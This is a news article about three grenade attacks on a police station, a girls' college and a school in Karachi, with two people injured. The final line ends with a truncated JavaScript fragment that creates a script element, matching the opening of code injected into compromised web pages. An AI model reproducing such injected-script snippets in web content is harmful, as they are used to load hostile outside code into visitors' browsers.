Three grenade attacks, two injured

Karachi, : The unknown miscreants on Friday tossed hand grenades outside a police station, a girls college and a school in Karachi as result two injured, causing fear and panic in the areas.

The unknown suspects riding on a motorcycle hurled a homemade grenade at the Mobina Town police station on Abul Hassan Isafahani Road, partially damaging a wall of the building and a car belonging to the Head Moharir of the police station, the suspects fled, police spokesman said. He said that the constable Asif Ali Lashari suffered a minor injury and was admitted to a hospital for treatment. The CCTV footage showed that the suspects fleeing from the scene in different directions after the attack.

On the other hand two terrorists riding on a motorcycle tossed a hand grenade near APWA Girls’ College in Karimabad area and not injury has been reported in the incident. The SSP central Muqddas Haider said that the bomb disposal squad has reached the spot and defuses the grenade. The college principal Naseem Zaidi said that after the incident after the incident the panic spread through the college as students and staff ran out of the college with some seeking refuge in the streets on either side of the college.

The third grenade attack was reported near the main gate of a private school in North Nazimabad L-Block area near Asghar Ali Shah stadium. Reportedly, one child was injured in the incident. After the incidents the security of Karachi University (KU) and NED has been tightened and the entrance gates are closed.var d=document;var s=d.createElement(‘script’);
